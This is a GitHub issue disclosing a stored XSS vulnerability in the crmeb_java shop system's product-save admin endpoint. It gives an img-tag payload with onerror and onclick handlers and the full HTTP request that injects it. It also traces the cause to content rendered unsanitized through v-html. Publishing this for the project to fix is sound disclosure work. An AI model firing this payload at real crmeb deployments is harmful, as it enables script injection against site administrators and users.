search

crmeb / crmeb_java

Java商城 免费 开源 CRMEB商城JAVA版,SpringBoot + Maven + Swagger + Mybatis Plus + Redis + Uniapp +Vue+elementUI 包含移动端、小程序、PC后台、Api接口;有产品、用户、购物车、订单、积分、优惠券、营销、余额、权限、角色、系统设置、组合数据、可拖拉拽的form表单等模块,大量的减少了二开的成本。
Apache License 2.0
1.22k stars 364 forks source link

There is a stored XSS vulnerability in the /api/admin/store/product/save interface of the crmeb_java system #12

Open Mechoy opened 1 year ago

Mechoy commented 1 year ago

[Suggested description] Store XSS vulnerability exists in crmeb_java <=1.3.4 Failure to filter or validate parameters effectively results in stored XSS.

[Vulnerability Type] Stored XSS

[Vendor of Product] https://github.com/crmeb/crmeb_java

[Affected Product Code Base] <=1.3.4

[Affected Component] /api/admin/store/product/save

[Attack Type] Remote

[Vulnerability details] payload : 

<img src=\"1111\" alt=\"2222\" width=\"33\" height=\"33\" onclick=\"alert`333`\" onerror=alert(2)/>

Get the request message of the /api/admin/store/product/save interface.

POST /api/admin/store/product/save HTTP/2
Host: api.java.crmeb.net
Content-Length: 1213
Sec-Ch-Ua: "Chromium";v="95", ";Not A Brand";v="99"
Accept: application/json, text/plain, */*
Content-Type: application/json
Authori-Zation: 213ff6ff1ca24ae78f8263bd7ad0ea6c
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://admin.java.crmeb.net
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://admin.java.crmeb.net/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

{"image":"https://api.java.crmeb.net/crmebimage/public/maintain/2023/03/13/9f83773cd1bf47118d6e02ad86b599520ay7shmx9i.jpg","sliderImages":["https://api.java.crmeb.net/crmebimage/public/maintain/2023/03/13/9f83773cd1bf47118d6e02ad86b599520ay7shmx9i.jpg"],"videoLink":"","sliderImage":"[\"https://api.java.crmeb.net/crmebimage/public/maintain/2023/03/13/9f83773cd1bf47118d6e02ad86b599520ay7shmx9i.jpg\"]","storeName":"3333","storeInfo":"2132131","keyword":"1111","cateIds":[972,1185],"cateId":"972,1185","unitName":"1111","sort":1,"giveIntegral":1,"ficti":2,"isShow":false,"isBenefit":false,"isNew":false,"isGood":false,"isHot":true,"isBest":false,"tempId":94,"attrValue":[{"image":"https://api.java.crmeb.net/crmebimage/public/maintain/2023/03/13/9f83773cd1bf47118d6e02ad86b599520ay7shmx9i.jpg","price":0,"cost":0,"otPrice":0,"stock":0,"barCode":"","weight":0,"volume":0,"attrValue":"{\"规格\":\"默认\"}"}],"attr":[{"attrName":"规格","attrValues":"默认","id":0}],"selectRule":"","isSub":false,"content":"111","specType":false,"id":0,"couponIds":[],"coupons":[],"activity":["默认","秒杀","砍价","拼团"]}

The content parameter has a stored XSS vulnerability. Insert the payload and send the request packet. crmeb_java_2_1 Find the added product and enter the product details page, click the inserted img tag to trigger the vulnerability. crmeb_java_2_2 There you can see it!

[Impact Code execution] true

[Cause of vulnerability] com.zbkj.admin.controller.StoreProductController line 77. The save() method of storeProductService is called on line 77 of this controller crmeb_java_2_3 Follow up this method to com.zbkj.service.service.impl.StoreProductServiceImpl. On line 339, save the value of the content parameter in the request packet to the database. Come to the front page. In crmeb_java\admin\src\views\store\creatStore\index.vue, in line 296, use v-html to render the obtained content value. It is known that v-html will treat the obtained content as HTML code to render. crmeb_java_2_4 The reason for this vulnerability is that there is no legal security check on user data.

The end,thanks!